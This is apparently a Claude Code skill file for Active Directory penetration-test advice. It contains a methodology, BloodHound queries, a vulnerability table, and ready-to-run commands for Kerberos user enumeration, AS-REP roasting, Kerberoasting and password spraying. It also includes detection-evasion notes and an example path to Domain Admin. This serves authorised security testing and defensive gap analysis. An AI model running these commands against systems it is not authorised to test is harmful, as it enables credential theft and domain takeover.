--- name: pentest-ad description: Active Directory pentest methodology — BloodHound graph analiz, Kerberos abuse, ACL exploitation, lateral movement path advisory. Triggers on Active Directory, AD pentest, BloodHound, Kerberoasting, AS-REP, DCSync, Golden Ticket, Silver Ticket, NTLM relay, lateral movement, Impacket, NetExec, Certipy. license: MIT compatibility: Works with Claude Code allowed-tools: Read Write Edit Bash Grep metadata: author: badi badi-version: ">=1.24.0" category: pentest scope: advisory inspired-by: 0xSteph/pentest-ai-agents ad-attacker (advisory tarafi) --- # pentest-ad Internal pentest Active Directory advisory. BloodHound graph, Kerberos zafiyet sinifi, ACL abuse, lateral path. Live komut composer'lama scope deklare ile. ## Triggers - "AD pentest" - "BloodHound graph analizi" - "Kerberoast hash buldum" - "DCSync edebilir miyim" - "lateral movement plani" - "Golden Ticket" - "NTLM relay" - "AD CS abuse" ## Methodology Akisi ``` 1. Enum: SMB, LDAP, DNS, GPP (passive ilk) 2. Cred: kerbrute users -> AS-REP roasting (no preauth) -> hashcat 3. Foothold: low-priv shell (phish/web/initial) 4. Recon: BloodHound -> high-value path 5. Privesc: ACL abuse, Kerberos delegation, GPO modify 6. Lateral: PtH, PtT, NTLM relay, WinRM, RDP 7. DA: DCSync (Replicating Changes), Golden Ticket (offline) 8. Persistence: Skeleton key, AdminSDHolder (TIER 2, scope-zorunlu) ``` ## BloodHound Graph Analizi Kullanici BloodHound JSON export verirse skill su queries calistirir (Cypher): ```cypher // Shortest path to Domain Admin from owned user MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p LIMIT 5 // Kerberoastable users with priv access MATCH (u:User {hasspn:true})-[:MemberOf|AdminTo*1..]->(c:Computer) WHERE u.enabled=true RETURN u.name, c.name // AS-REP roastable MATCH (u:User {dontreqpreauth:true, enabled:true}) RETURN u.name, u.serviceprincipalnames // Unconstrained delegation MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name, c.distinguishedname // GPO modify riski MATCH (g:GPO)<-[:GenericAll|GenericWrite|WriteOwner|WriteDacl]-(u) RETURN g.name, u.name ``` ## Yaygin AD Zafiyet Sinifi | Zafiyet | Tespit | Etki | |---------|--------|------| | AS-REP roast | `DONT_REQUIRE_PREAUTH` flag | Offline crackable hash | | Kerberoast | User SPN + RC4 ticket | TGS hash crack -> service acc | | Unconstrained delegation | Computer object flag | DC printer bug ile compromise | | NTLM relay | SMB sign off, web auth | Account takeover via relay | | ACL abuse | GenericAll, WriteDacl | Reset password, add to group | | ADCS ESC1-ESC8 | Vulnerable cert template | Domain admin via cert | | LAPS read | ReadProperty ms-Mcs-AdmPwd | Local admin password leak | | GPO modify | WriteProperty on GPO link | Mass policy compromise | | Constrained delegation | Service can impersonate | DA via service abuse | | MSSQL trustworthy | xp_cmdshell + sysadmin | SQL -> OS command | ## Onerilen Komutlar (Scope Gerekli) ```bash # QUIET — anonymous LDAP enum ldapsearch -x -H ldap:// -b "DC=domain,DC=local" -s sub # MODERATE — Kerberos user enum (no auth needed) kerbrute userenum --dc -d domain.local users.txt # MODERATE — AS-REP roast (cred yok) GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip # MODERATE — Kerberoast (cred ile) GetUserSPNs.py domain.local/user:password -dc-ip -request # MODERATE — BloodHound collection bloodhound-python -u user -p password -d domain.local -ns -c All # LOUD — NetExec spray (single password, all users) nxc smb -u users.txt -p 'Spring2026!' --continue-on-success ``` ## OPSEC Notlari - AS-REP roast: domain controller event 4768 (Kerberos pre-auth failure) — DETECT edilir - Kerberoast: TGS-REQ event 4769 + service ticket encryption type 0x17 (RC4) — anormallik - BloodHound: massive LDAP query trafik (default coll). Yavasla: `--throttle 30` - NetExec spray: tek password tum users -> account lockout policy tetiklenir (3 yanlis -> 30dk kilit yaygin) ## Bulgu Output Sablonu ```markdown ## AD Compromise Path — ### Owned Path 1. anonymous SMB shares -> credentials.txt buldum 2. cred: backup-svc / Backup2024! 3. backup-svc Kerberoastable -> hash crack 4 dakika 4. backup-svc -> ServerAdmins group member 5. ServerAdmins -> WriteDacl on Domain Admins 6. Tek komut: net group "Domain Admins" attacker /add -> DA ### Detection Gap (Defansif Cikti) - Anonymous SMB share access NOT logged - ServerAdmins WriteDacl change NOT detected (no Event 5136 alert) - Onerilen Sigma rule: pentest-detection altinda ``` ## Out-of-Scope - Live exploit calistirma (GenericAll abuse Bash composer'i scope ile) - Persistent backdoor (Skeleton Key gibi) — engagement disinda kalir - DC fiziksel attack